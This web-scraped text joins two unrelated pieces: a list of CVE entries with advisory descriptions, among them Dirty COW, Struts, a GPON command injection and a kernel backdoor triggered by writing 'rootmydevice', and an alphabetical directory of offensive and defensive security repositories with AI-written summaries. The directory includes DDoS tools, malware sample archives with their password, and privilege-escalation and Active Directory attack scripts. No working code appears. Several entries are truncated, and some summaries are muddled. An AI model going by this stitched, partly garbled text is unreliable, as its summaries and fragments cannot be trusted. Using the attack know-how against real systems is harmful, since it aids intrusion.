CVE-2015-5531	Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
CVE-2016-1909	Fortinet FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5; FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8; and FortiOS 4.1.x before 4.1.11, 4.2.x before 4.2.16, 4.3.x before 4.3.17 and 5.0.x before 5.0.8 have a hardcoded passphrase for the Fortimanager_Access account, which allows remote attackers to obtain administrative access via an SSH session.
CVE-2016-10225	The sunxi-debug driver in Allwinner 3.4 legacy kernel for H3, A83T and H8 devices allows local users to gain root privileges by sending “rootmydevice” to /proc/sunxi_debug/sunxi_debug.
CVE-2016-3087	Apache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.
CVE-2016-4338	The mysql user parameter configuration script (userparameter_mysql.conf) in the agent in Zabbix before 2.0.18, 2.2.x before 2.2.13, and 3.0.x before 3.0.3, when used with a shell other than bash, allows context-dependent attackers to execute arbitrary code or SQL commands via the mysql.size parameter.
CVE-2016-5195	Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka “Dirty COW.”
CVE-2016-6277	NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
CVE-2016-6415	The server IKEv1 implementation in Cisco IOS 12.2 through 12.4 and 15.0 through 15.6, IOS XE through 3.18S, IOS XR 4.3.x and 5.0.x through 5.2.x, and PIX before 7.0 allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request, aka Bug IDs CSCvb29204 and CSCvb36055 or BENIGNCERTAIN.
CVE-2016-7124	ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.
CVE-2017-0199	Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka “Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.”
CVE-2017-1000353	Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We’re fixing this issue by adding `SignedObject` to the blacklist. We’re also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.
CVE-2017-12615	When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.
CVE-2017-17411	This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges. Was ZDI-CAN-4892.
CVE-2017-5135	Certain Technicolor devices have an SNMP access-control bypass, possibly involving an ISP customization in some cases. The Technicolor (formerly Cisco) DPC3928SL with firmware D3928SL-P15-13-A386-c3420r55105-160127a could be reached by any SNMP community string from the Internet; also, you can write in the MIB because it provides write properties, aka Stringbleed. NOTE: the string-bleed/StringBleed-CVE-2017-5135 GitHub repository is not a valid reference as of 2017-04-27; it contains Trojan horse code purported to exploit this vulnerability.
CVE-2017-5638	The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
CVE-2017-5689	An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).
CVE-2017-7494	Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.
CVE-2017-8464	Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka “LNK Remote Code Execution Vulnerability.”
CVE-2017-9791	The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
CVE-2018-4407	Apple iOS 11 and earlier, Apple macOS High Sierra, up to and including 10.13.6, Apple macOS Sierra, up to and including 10.12.6, Apple OS X El Capitan and earlier. A heap buffer overflow is allowed in Apple’s XNU operating system kernel.
CVE-2018-7600	Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
CVE-2018-10562	An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output.
MS17_010	https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
NETCORE_NETDIS_UDP-53413-BACKDOOR	http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/

LADX-Disassembly

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: LADX-Disassembly is a comprehensive disassembly project for the Game Boy Color game “The Legend of Zelda: Link’s Awakening DX,” enabling developers to build multiple ROM versions in various languages (Japanese, English, German, French) along with their debug symbols. It features tools and documentation for reverse engineering the game engine and understanding data formats, providing a wiki for navigation and contributions. The project also invites community participation to improve its code and documentation.

lamda

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FIRERPA is an advanced Android automation framework designed for on-device operations, providing a comprehensive suite of over 160 APIs for device management, UI automation, and diagnostics. Its primary use case is to enable lightweight, efficient automation for both physical and virtual Android devices, integrating AI-driven capabilities with robust remote desktop services. Notable features include built-in ADB/SSH/SCP support, extensive logging, encrypted scripting, and seamless deployment across a range of Android versions without complex configuration requirements.

landrun

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Landrun is a lightweight sandboxing tool for Linux designed to run processes securely using the Landlock kernel security module, enabling fine-grained control over filesystem and network access without the need for root privileges or containerization. Notable features include kernel-level security, customizable read, write, and execution permissions for files and directories, and TCP access control, making it suitable for securely executing commands in an isolated environment. With a minimal overhead architecture, it offers a practical solution for developers needing enhanced process security.

lazy_importer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: lazy_importer is a C++ library designed to obfuscate API calls, enhancing the difficulty of reverse engineering software by ensuring that no identifiable strings or import declarations remain in memory or the executable. Key features include inlining capabilities, zero memory allocation, randomized function hashes for each compilation, and the ability to call functions without leaving a trace in data sections. This tool is particularly valuable for developers aiming to protect their software from static analysis and reverse engineering techniques.

leaky-paths

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Leaky Paths is a curated repository of high-quality wordlists designed for web content discovery, targeting misconfigurations and sensitive API endpoints in major web frameworks and infrastructure projects. It serves as a rapid assessment tool for pentesters, security engineers, and bug bounty hunters, emphasizing modern tech stack paths that yield valuable insights while intentionally maintaining a concise list for optimal efficiency. Notable features include paths associated with known vulnerabilities and endpoints that typically expose sensitive data, facilitating quick identification of potential security issues.

Learn-Web-Hacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Learn-Web-Hacking is a comprehensive guide designed for individuals interested in web security, systematically organizing essential concepts and knowledge related to web application vulnerabilities, network protocols, and penetration testing. It provides a historical perspective on the evolution of web security, foundational networking concepts, and a detailed exploration of common web vulnerabilities and defensive strategies. Additionally, it includes tool recommendations and resources, making it a valuable resource for both beginners and practitioners in the cybersecurity field.

learn365

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Learn365 is a personal initiative designed to promote continuous learning, focusing on various cybersecurity topics and methodologies over a year-long challenge. The repository includes extensive documentation covering diverse subjects such as vulnerability exploitation, secure coding practices, and penetration testing checklists. Notable features include daily learning topics with associated resources and mind maps, making it a comprehensive tool for knowledge enhancement in the infosec domain.

README

Learn365

This repository contains all the information shared during my Learn 365 Challenge. Learn 365 is a challenge to keep the learning spirit going on and challenge myself to learn something daily for the whole year, it can be anything from infosec to general life. Follow me on Twitter for Regular Updates: Harsh Bothra. Huge thanks to Mehedi Hasan Remon, who originally created and maintained this repository.

learning-reverse-engineering

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Learning Reverse Engineering repository provides a collection of programs aimed at enhancing skills in reverse engineering and malware analysis. It organizes content by specific concepts related to reverse engineering, delivers both source code and compiled binaries, and includes links to supplementary online courses and video playlists. Notable features include guidance on using various tools like Ghidra and IDA Pro, as well as instructions for compiling the source code with Microsoft’s C/C++ compiler.

Legendary_OSINT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Legendary OSINT is a comprehensive curated repository of open-source intelligence (OSINT) tools and resources designed to aid users in various investigative scenarios. It encompasses a diverse range of categories, including social media searches, geospatial analysis, malware investigation, and dark web monitoring, facilitating enhanced data collection and analysis for cybersecurity professionals and researchers. Notable features include categorized documentation, contributions from multiple sources, and a focus on responsible usage of third-party tools.

libc-database

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: libc-database is a tool for building and querying a database of libc offsets, primarily used for security research and exploitation analysis. It offers features such as identifying libraries via hashes, downloading and extracting libc libraries, and a web interface for user interaction. Users can also add custom libc versions and retrieve relevant offsets for specific symbols, enhancing their ability to work with different environments in cybersecurity applications.

README

Web interface

libc-database now has a web service and frontend. Visit https://libc.rip/ to try it out! Read https://github.com/niklasb/libc-database/tree/master/searchengine if you are interested in the API.

librw

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: librw is a cross-platform library designed to re-implement parts of RenderWare graphics, facilitating rendering and file format conversion across various platforms. It supports DFF and TXD file formats for PS2, D3D8, D3D9, and Xbox, with rendering capabilities via D3D9 and OpenGL backends, while being particularly useful for rendering within projects like GTA. Notable features include adaptable file format support, backend rendering versatility, and ongoing compatibility for multiple platforms.

lighthouse

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Lighthouse is an advanced code coverage explorer plugin designed for IDA Pro and Binary Ninja, aimed at software researchers examining execution maps of native applications without the need for symbols or source code. It features interactive controls for coverage painting across multiple views, customizable coverage formats, and a comprehensive overview widget that enhances analysis capabilities. The tool has garnered recognition within the security research community, placing in IDA’s 2017 Plug-In Contest and receiving a nomination for the 2021 Pwnie Awards.

ligolo-ng

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ligolo-ng is an advanced tunneling tool that establishes connections through a TUN interface, enabling penetration testers to create reverse TCP/TLS tunnels without the need for SOCKS proxies. Notable features include a user-friendly web interface, automatic configuration for certificates, support for multiple platforms, and resilience to network issues with automatic tunnel recovery. Its design facilitates streamlined network management and the ability to run tools directly over these tunnels.

README

Ligolo-ng : Tunneling like a VPN

like-dbg

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: LIKE-DBG is a tool designed to simplify the setup of a Linux kernel debugging environment by automating essential steps such as kernel building, root file system creation, and kernel launching within Docker containers. It offers a highly customizable configuration approach and supports multiple architectures, enabling researchers in kernel exploitation to focus on their work rather than the complexities of environment setup. Notable features include a dedicated Docker setup for each phase, support for various compilation methods, and integrated code quality measures.

linkedin2username

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: linkedin2username is an OSINT tool designed to generate potential username formats for employees of a specified company using LinkedIn’s web interface, requiring user authentication without an API key. Key features include customizable output formats for usernames, the ability to append domain names, and options for depth of search and filtering by keywords. The tool leverages web scraping techniques and is sensitive to LinkedIn’s rate limits, making it suitable for security research purposes.

linkook

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Linkook is an OSINT tool designed for discovering linked social media accounts and associated emails based on a single username across multiple platforms. Its notable features include the ability to check for email breaches using HudsonRock’s Cybercrime Intelligence Database, and exporting scan results in a Neo4j-compatible format for visual analysis. The tool supports various command-line options for summarizing output, detailed scans, and configuring data handling.

README

Linkook

English | 中文

linux-exploit-suggester

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Linux Exploit Suggester (LES) is a tool for auditing Linux systems to identify potential privilege escalation vulnerabilities, assessing the system’s exposure to known exploits by utilizing heuristic methods. It calculates the likelihood of exploitation for each vulnerability and verifies kernel hardening configurations, offering a comprehensive analysis of both compile-time and run-time security settings. Notable features include detailed exploit documentation, exposure assessment ratings, and integration with kernel hardening verification, making it a valuable resource for security assessments on Linux-based environments.

linux-kernel-exploitation

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Linux Kernel Exploitation repository serves as a curated collection of resources pertaining to Linux kernel security and exploitation techniques. It provides extensive links to books, methodologies, tools for fuzzing, and training exercises, making it a comprehensive reference for security researchers and practitioners interested in kernel vulnerabilities and exploitation strategies. Notable features include regular updates, categorized content on various exploitation techniques, and a community-driven approach encouraging contributions via pull requests.

linux-kernel-exploits

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The linux-kernel-exploits repository provides a catalog of various known vulnerabilities within the Linux kernel, detailing specific CVEs along with their descriptions and affected kernel versions. Its primary use case is to aid security researchers and penetration testers in identifying and exploiting kernel vulnerabilities for testing and mitigation purposes. Notable features include a comprehensive list of CVEs organized by year, along with linked folders containing additional exploit details.

README

linux-kernel-exploits

简介

linux-kernel-exploits

linux-smart-enumeration

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Linux Smart Enumeration (LSE) is a shell script designed for penetration testing and Capture The Flag (CTF) challenges, aimed at gathering security-relevant information to assist in privilege escalation on Linux systems. Notable features include customizable verbosity levels, targeted section execution, process monitoring, and the ability to serve the script over the network for remote retrieval. The tool is intended to expose vulnerabilities gradually, prioritizing information based on its significance for privilege escalation.

linuxprivchecker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Linuxprivchecker is a Python script designed for local execution on Linux systems, aimed at enumerating system information and identifying common privilege escalation vectors, such as world writable files and misconfigurations. Its primary use case is to assist users in learning about potential privilege escalation opportunities within Linux environments without performing direct exploits. Noteworthy features include support for both Python 2 and 3, command options for customizing searches and log outputs, and an emphasis on educational utility for those preparing for penetration testing certifications like OSCP and HTB.

linWinPwn

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: linWinPwn is a comprehensive bash script designed for Active Directory penetration testing on Linux, integrating various tools for enumeration, vulnerability checks, modifications, and password dumping. It features both an interactive mode for manual checks and an automated mode for streamlined enumeration, allowing users to perform a wide array of security assessments including LDAP, Kerberos, and MSSQL interactions. Notably, it supports a range of authentication methods and can execute critical checks for known vulnerabilities such as NoPac and ZeroLogon, making it an essential tool for security professionals.

lisa.py

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: lisa.py is a Model-Context Protocol (MCP) integration for LLDB, enabling AI assistants like Claude to interact with debugging sessions through a structured interface. It consists of a server component to handle communication and a plugin for LLDB that exposes debugging functionalities via JSON-RPC, allowing users to execute commands verbally and enhance the debugging experience with natural language processing. Notable features include the capability to create targets, manage breakpoints, control process execution, and evaluate expressions directly from the AI assistant.

LitterBox

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: LitterBox is a security analysis tool that provides a controlled sandbox environment for red teams to develop, test, and validate exploitation payloads and evasion techniques against modern detection systems. It features advanced analysis capabilities, including file identification, executable and document analysis, and LLM-assisted insights for improved malware behavior examination. Additionally, LitterBox supports various platforms, including Windows and Linux, and integrates easily with Docker, enhancing its usability in diverse security scenarios.

llm-guard

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: LLM Guard is a security toolkit designed to enhance the safety of interactions with Large Language Models (LLMs) by providing features such as input sanitization, harmful language detection, data leakage prevention, and protection against prompt injection attacks. It supports easy integration into production environments and offers a variety of prompt and output scanners tailored for specific security concerns. The tool is continuously updated to adapt to emerging threats, ensuring robust security for LLM applications.

LME

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CISA’s Logging Made Easy (LME) is an open-source log management platform designed for small to medium-sized organizations to centralize log collection, enhance threat detection, and enable real-time alerting for improved security. Key features include integration with open-source tools for enhanced detection, automated deployment via Ansible scripts, and customizable dashboards with Kibana, making it a scalable solution for securing infrastructure without the need for an existing Security Operations Center (SOC) or extensive resources.

Lockdoor-Framework

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Lockdoor is a pentesting framework that aggregates a variety of tools for tasks such as information gathering, web hacking, privilege escalation, and reverse engineering. Its notable features include a collection of pre-configured tools categorized by function, support for multiple operating systems, and the ability to generate security assessment reports. However, it is important to note that the project is no longer actively maintained.

README

Lockdoor v2.3
⚠️ This project is not maintained anymore. ⚠️

Find more at https://g.co/kgs/TtYRJJP

Table of contents
Changelog 📌 :
Badges 📌 :
Support me 💰 :
Contributors ⭐ :
Versions
- 06/2021 : 2.3
- 03/2020 : 2.2.3
Blogs & Articles 📰 :
Overview 📙 :
Features 📙 :
- Pentesting Tools Selection 📙 :
- Resources and cheatsheets 📙 :
Screenshots 💻 :
Demos 💻 :
Installation 🛠️ :
Lockdoor Tools contents 🛠️ :
Lockdoor Resources contents 📚 :
Contributing :

Changelog 📌 :

Version v2.3 IS OUT !!

 - Fixing some CI 

 - making a more stable version 

 - new docker iaage build

 - adding packages for each supported distros

Badges 📌 :

lonkero

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Lonkero is a professional-grade web security scanner engineered for advanced penetration testing, boasting over 125 sophisticated scanning modules written in Rust. Its notable features include an intelligent mode for context-aware scanning, machine learning capabilities to minimize false positives to 5%, and unique proof-based XSS detection that eliminates reliance on browsers, significantly increasing scan speed and accuracy. By leveraging a robust architecture that focuses on real vulnerabilities, Lonkero delivers efficient and precise security assessments for modern web technologies.

lumen

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Lumen is a private server designed to integrate with IDA Pro 7.2 and later versions, enabling users to efficiently manage and retrieve function signatures via its database-backed infrastructure utilizing PostgreSQL. It features an experimental HTTP API for querying by function hash or file, facilitating collaborative reverse engineering workflows. The tool is provisioned with a straightforward setup through Docker and can be used with custom TLS configurations for secure communications.

lunasec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: LunaTrace is an open-source supply chain security and auditing tool that monitors software dependencies for vulnerabilities, integrating seamlessly with GitHub to notify users of new CVEs before deployment. It offers both a free SaaS option and self-hosted deployment capabilities, making it a versatile alternative to commercial tools like GitHub Dependabot and Snyk. Notable features include automatic monitoring, GitHub Pull Request integration, and active development support.

README

LunaTranslator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: 视觉小说翻译器 / Visual Novel Translator

视觉小说翻译器 / Visual Novel Translator

lynis

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Lynis is a security auditing and hardening tool designed for UNIX-based systems, including Linux, macOS, and BSD. It conducts comprehensive security scans to evaluate system defenses, identify vulnerabilities, and suggest improvements for hardening systems against potential threats. Notable features include automated compliance testing, vulnerability detection, configuration management assistance, and adaptability for use by system administrators, auditors, and penetration testers.

README

Documentation

Do you like this software? Star the project and become a stargazer.

maigret

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Maigret is a user-centric OSINT tool designed to gather comprehensive profiles based on usernames by scanning over 3000 websites, including Tor and I2P networks. Key features include profile data extraction, recursive search capabilities, and automated handling of censorship and captcha challenges, all without requiring API keys. This tool serves as an effective resource for analysts in social media investigations and identity verification.

README

Maigret

mailcat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Mailcat is a tool designed to discover existing email addresses based on a user’s nickname, supporting over 170 domains across 37 email providers. It offers functionality through scripts that can be run via Tor or proxy to maintain anonymity, and it employs various methods such as SMTP and API for address retrieval. Notable features include extensive provider support and options for managing connection limits to enhance performance.

README

mailcat

makin

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: makin is a malware assessment tool designed to simplify the process of identifying anti-debugging techniques employed by malicious samples. It injects a DLL into the target process to monitor specific API calls, providing insights into debugger detection methods, and can generate IDA Pro scripts for setting breakpoints at the identified APIs. Notable features include the ability to hook various functions from ntdll.dll and kernelbase.dll, effectively revealing complex anti-debugging strategies.

mal_unpack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: mal_unpack is a dynamic malware unpacker that leverages PE-sieve to deploy packed malware, allowing it to unpack and dump the payload while terminating the original process. Its primary use case is for malware analysis in controlled environments, with notable features including options for dumping implanted PEs, shellcodes, and modified artifacts, as well as performance enhancements through an auxiliary driver.

README

mal_unpack

malboxes

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Builds malware analysis Windows VMs so that you don’t have to.

Builds malware analysis Windows VMs so that you don’t have to.

malcom

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Malcom is a malware communication analyzer that visualizes network traffic to identify interactions with known malware sources, thereby aiding in malware analysis and intelligence gathering. Its primary use case is to detect command and control servers, monitor peer-to-peer networks, and unravel DNS fast-flux infrastructures. Notable features include its ability to convert complex network traffic data into actionable intelligence and a user-friendly graphical interface for rapid analysis.

README

Malcom - Malware Communication Analyzer

Malcom is a tool designed to analyze a system’s network communication using graphical representations of network traffic, and cross-reference them with known malware sources. This comes handy when analyzing how certain malware species try to communicate with the outside world.

malicious-pdf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Malicious PDF is a tool designed to generate various malicious PDF files featuring phone-home capabilities for use in penetration testing and red-teaming. It supports integration with platforms like Burp Collaborator and Interact.sh, providing a diverse set of attack vectors through ten different crafted PDF examples meant for testing web applications, security products, and PDF readers. Key features include the ability to create PDFs exploiting vulnerabilities like external file access, JavaScript injection, and form data exfiltration.

malware_training_vol1

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “malware_training_vol1” repository provides a comprehensive training resource designed for individuals looking to deepen their understanding of Windows malware analysis. It offers a blend of theoretical knowledge and practical exercises covering a range of topics including PE structure, process management, and various malware tactics, while leveraging specific tools for effective analysis. Key features include structured modules, hands-on exercises, and a focus on core concepts essential for aspiring malware analysts.

Malware-Exhibit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Malware-Exhibit is a malware analysis tool designed for researchers and security professionals to dissect and analyze various malware samples. It supports multiple programming languages and platforms, allowing users to examine the behavior and characteristics of malware, providing insights for threat detection and mitigation. Notable features include a comprehensive user interface and the ability to integrate additional analysis tools and scripts.

README

⚠️⚠️ Malware-Exhibit ⚠️⚠️

malware-samples

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The malware-samples repository is a curated collection of malware samples gathered from various honeypots managed globally, intended for research and analysis purposes. Users are encouraged to download, analyze, and reverse-engineer the samples while adhering to safety precautions, as the repository includes actual malware that may not be flagged by antivirus tools. Notably, all archived samples are password protected, with access secured by the password “infected.”

README

malware-samples

A collection of malware samples caught by several honeypots i handle worldwide

malware-samples

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The InQuest malware-samples repository serves as a curated collection of malware samples along with associated dissection details, primarily aimed at researchers and analysts in cybersecurity. Its notable features include a variety of sample types such as documents, executables, and macros, as well as links to in-depth analyses and reports, enhancing the understanding of malware behavior and leveraging for education and testing purposes. The tool is particularly useful for studying real-world exploit scenarios and dissecting malware payloads for security assessments.

malwoverview

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Malwoverview is a versatile malware analysis tool designed for cybersecurity professionals to visualize and understand malware architecture without submitting samples to external endpoints, thereby ensuring compliance with Non-Disclosure Agreements. Its primary use case involves generating detailed reports on malware characteristics, and it offers a variety of analysis features, including dynamic and static analysis capabilities, and an intuitive user interface for enhanced usability. The tool is free and open-source, allowing users to modify and redistribute it under the GNU General Public License.

mantis

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Mantis is a command-line framework that automates the processes of asset discovery, reconnaissance, and scanning for vulnerabilities. It efficiently identifies subdomains, certificates, and active assets, culminating in comprehensive scans for misconfigurations and secrets using a combination of open-source and custom tools. Notable features include distributed scanning capabilities, customizable scans, a dashboard for vulnerability management, and integration with various DNS services.

README

Features • Modules • Installation • Command Line Options • Documentation • Contributors • Join Discord

Massive-Web-Application-Penetration-Testing-Bug-Bounty-Notes

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Massive Web Application Penetration Testing Bug Bounty Notes repository provides a comprehensive guide tailored for both novice and advanced penetration testers, emphasizing methodologies for web application security assessments. It covers essential topics such as setting up testing environments, identifying and exploiting the OWASP Top 10 vulnerabilities, and practical resources like video tutorials for enhanced learning. Notable features include a structured approach to various testing phases, from foundational concepts to specific attack vectors related to session management, authentication, and business logic vulnerabilities.

matano

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Matano is an open-source cloud-native security data lake specifically designed for AWS, enabling security teams to normalize and manage security logs effectively. Its notable features include the ability to integrate with over 50 log sources, support for Detection-as-Code using Python, serverless architecture for scalability, and vendor-neutral ownership through open standards. The tool aims to enhance SIEM capabilities by providing a cost-effective and versatile solution for security data management and analysis.

matkap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Matkap is a cybersecurity tool designed for the analysis of malicious Telegram bots, primarily intended for educational and research purposes. It integrates with FOFA and URLScan to search for leaked bot tokens and chat IDs, allowing users to monitor and log Telegram interactions while offering functionalities to export harvest messages. Notable features include the ability to forward messages from malicious bots and comprehensive logging capabilities for monitoring bot tokens across various platforms.

medusa

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Medusa is a modular and interactive disassembler that supports Windows, Linux, and OSX platforms, tailored for analyzing various file formats such as ELF, PE, Mach-O, and GameBoy binaries. It integrates seamlessly with libraries like Boost and Qt5, offering an extensible architecture for disassembly and limited semantic analysis, particularly for specific instruction sets like x86 and GameBoy. Notable features include support for file imports and exports, varying levels of symbol handling, and the ability to work with multiple architectures and binary types.

metabigor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Metabigor is an open-source intelligence (OSINT) tool designed for various information-gathering tasks without the need for API keys. It features capabilities such as network discovery, subdomain enumeration through certificate transparency logs, IP enrichment with Shodan InternetDB, and the ability to detect CDNs or WAFs, making it versatile for cybersecurity research and analysis. Notably, it allows users to automate input processing and batch queries for efficient data collection and analysis.

MetaOSINT.github.io

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MetaOSINT is an open-source intelligence aggregation tool designed to assist OSINT practitioners in efficiently identifying and accessing relevant publicly available tools and resources. Its primary purpose is to streamline investigations by providing a curated list of top tools, significantly enhancing the speed and effectiveness of research and analysis. Notable features include an intuitive interface for surfacing resources and the ongoing community contribution model that allows users to submit additional tools.

MetaRadar

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MetaRadar is a Bluetooth Low Energy (BLE) analysis tool designed for educational and security research purposes, enabling users to scan, analyze, and track nearby BLE devices. Its notable features include customizable filtering of BLE broadcasts, deep analysis of device GATT services, and real-time alerts for suspicious devices, thereby enhancing user awareness and control over device privacy. The application operates offline and does not share personal or geolocation data, emphasizing user privacy and security.

metarget

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Metarget is a framework designed to automatically deploy vulnerable cloud-native infrastructures for security research purposes. It allows users to swiftly instantiate environments with known vulnerabilities (e.g., Docker and Kubernetes exploits) using simple command-line instructions, thus minimizing setup time for ethical hacking and testing scenarios. Notable features include the ability to “install” vulnerabilities like software packages, enabling researchers to quickly create multilayer vulnerable scenes for comprehensive testing and learning.

MHDDoS

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: MHDDoS is a Python-based DDoS attack scripting tool that features 57 distinct attack methods, primarily targeting Layer 7 protocols. It offers advanced techniques such as GET and POST floods, as well as bypass mechanisms for various DDoS protection services, enabling users to perform sophisticated denial-of-service attacks while adhering to ethical guidelines. Notable capabilities include methods for random subdomains, slowloris attacks, and cookie manipulation, making it a versatile tool for testing web application resilience.

miasm

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Miasm is an open-source reverse engineering framework primarily designed for the analysis, modification, and generation of binary programs, supporting formats such as PE and ELF for both 32 and 64-bit architectures. Notable features include assembly and disassembly capabilities for various architectures like X86, ARM, and MIPS, intermediate representation for semantic analysis, JIT-based emulation, and advanced techniques for automatic de-obfuscation. The framework facilitates dynamic code analysis, making it an invaluable tool for security researchers and reverse engineers.

MicrosoftWontFixList

Mon, 30 Mar 2026 00:00:00 +0000

